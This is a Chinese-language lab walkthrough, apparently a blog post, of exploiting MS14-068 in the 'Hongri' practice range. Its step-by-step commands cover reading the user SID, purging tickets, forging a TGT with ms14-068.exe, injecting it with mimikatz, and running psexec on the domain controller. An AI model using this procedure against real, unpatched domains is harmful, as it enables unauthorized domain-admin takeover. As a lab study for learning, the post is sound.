提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
文章目录
- 前言
- 一、MS14-068的利用条件?
- 二、利用步骤
- 1.查看服务器是否打补丁
- 2.获取用户的sid值
- 3.删除系统票据
- 4.生成票据
- 5.导入票据
- 6.提权利用
- 总结
前言
ms14-068漏洞主要通过伪造域管的TGT,将普通用户权限提权为域管权限,以此来控制域控。只要服务器未打ms14-068补丁(KB3011780),在server 2000以上的域控服务器中,都可进行利用。
一、MS14-068的利用条件?
1、获取域普通用户的账号密码
2、获取域普通用户的sid
3、服务器未打KB3011780补丁
关于防火墙问题,在红日靶场中,未关闭域控的防火墙仍可进行利用。
二、利用步骤
本次主要使用红日靶场,为了方便,直接在win7机器中运行脚本进行展示。
win2008 域控 192.168.52.138
win2007 域机器 192.168.52.143
1.查看服务器是否打补丁
命令行输入systeminfo,查看,发下未打补丁,可以利用
2.获取用户的sid值
本次使用的域用户为liumei,使用whoami /all 查询sid
注意sid需要输入正确,因为无法复制,输入错了sid,导致最后导入票据仍失败访问域控。
3.删除系统票据
klist purge/mimikatz里面输入kerberos::purge(因为本机使用klist purge删除后在mimikatz里面查询发下仍存在票据,所以最后两个地方都进行了删除)
klist purge
kerberos::purge(需要管理员身份运行,再提权后进行删除)
之前使用红日靶场自带的liukaifeng01账号进行的测试,为了能成功运行mimikatz,所以本地设置liukaifeng01为本地管理员用户,查询此账号不是域管账号,但以管理员运行后dir可直接读到域控信息。所以最后创建了liumei账号进行的测试。
4.生成票据
直接github下载ms14-068.exe软件进行的测试(下载地址:https://github.com/ianxtianxt/MS14-068)
输入命令
ms14-068.exe -u liumei@god.org -p password -s S-1-5-21-2952760202-1353902439-2381784089-1108 -d owa.god.org
-d 参数为域控+域名称
发现目录下生成TGT_liumei@god.org.ccache
5.导入票据
kerberos::ptc TGT_liumei@god.org.ccache
6.提权利用
导入票据后,可重新以管理员身份打开cmd命令行(导入票据前以管理员身份运行执行dir命令显示拒绝访问),但是需要注意的是,提权后也需要以管理员运行cmd再利用,不然仍提示拒绝访问。
klist查询发现成功导入
执行dir \owa\c$
使用psexec执行域控命令
psexec64.exe \\owa cmd
执行ipconfig,发现显示域控的ip,利用成功。
总结
以上就是今天要讲的内容,本文仅仅简单介绍了ms14-068的使用,而域控提权仍存在很多利用方式,以后慢慢学习吧。
